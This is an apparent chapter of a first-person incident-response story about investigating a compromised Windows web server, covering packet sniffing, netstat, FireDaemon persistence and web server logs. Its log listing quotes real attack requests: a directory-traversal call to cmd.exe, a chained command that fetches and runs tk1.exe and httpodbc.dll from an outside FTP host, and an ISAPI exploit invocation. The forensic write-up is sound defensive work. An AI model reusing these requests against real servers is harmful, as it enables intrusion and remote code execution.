Let the Games Begin: Day 2, Afternoon
I couldn't get to the site until the following afternoon. However, this gave me time to plan a tentative method of approach. After thinking through my options, I determined that the best possible approach to determine what the hacker was up to would be to install a sniffer to see if I could capture any telnet or ftp passwords used by the hacker when he logged in. I also planned on taking a close look at the log files and file system to see if any changes in the last 24 hours could account for the latest dilemma. While this seemed like a shot in the dark, at best, it ironically provided me an answer that I wasn't yet even looking for.
When I got to the site, I immediately set up shop. The site uses hub-based networking, so instead of switched networking, I was able to simply plug my laptop into the network and start sniffing the traffic.
Hubs broadcast data to all ports and let the device at the end of the wire determine whether a packet was sent to them. Switches, on the other hand, monitor the hardware address of each device plugged into it and pass information to that port only if it is meant to go there. This makes sniffing on a switched network a bit more challenging. (See my article "The Ingredients to ARP Poison.")
My goal was to collect data and analyze it later using Ethereal. To facilitate this, I started up tcpdump on my laptop (running Linux) and directed it to save the capture to a file on my hard drive. With this done, I started looking around on the server at the file system, network connections, and services that were running.
I started with Netstat, which provides its user with information about the network connection. As you can see in Figure 2, several suspicious connections were very obvious (note the connections to the IRC servers). Next, I took a look at the task list, which shows the programs currently running on the computer. Here, I noticed an unusual service called FireDaemon. After a quick search online, I found out that FireDaemon is a "utility that allows you to install and run virtually any native Win32 application or script (e.g. BAT/CMD, Perl, Java, Python) as a Windows NT/2K/XP service." In other words, FireDaemon is a hacker's dream come true. By installing a root kit as a service, a hacker can basically guarantee that the root kit will execute if the server is rebooted.
Figure 2 Netstat results on hacked server.
Finally, I started to look around the server to see if I could discover how the hacker got in. I started with the Web server logs and found the entries in Listing 1.
Listing 1: Web Server Log Entries
209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe, 209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, 83250, 270, 148, 200, 0, GET, /scripts/script.exe, /c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>email@example.com>> tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye>> tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd, 209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+% 2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe, 209.115.xxx.xxx, -, 10/31/02, 16:06:26, W3SVC, EXCHANGE, 64.3.xxx.xxx, 828, 174, 576, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+% 2Fc+del+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe,
Using this entry as a path, I went to the specified folder and found three files: tmp2, tmp2.cmd, and httpobdc.dll. I opened the first two files in Notepad and discovered that they were FTP command files and a batch file that downloaded tk1.exe and httpodbc.dll, a file commonly used by Nimda. Because the FTP command files pointed to a server using an anonymous account, I logged into the still existing FTP server and grabbed a copy of the file for my own future investigation.
I continued my exploration of the server and confirmed that this hack job was definitely the reason why the Web server was offline and why there were two new ports opened on the server. This assumption was based on the fact that the tk1.exe download occurred seconds before the Web server log file went blank, and the FTP server that was currently running on port 65130 showed that was a "TK DISTRO."
At this point, I was ready to head home. Based on the Netstat results and the newly found information regarding the mysterious TK, I was guessing that this particular hack job was an FTP/back door/IRC Trojan all wrapped up in one nice file (tk1.exe). However, this theory had yet to be validated.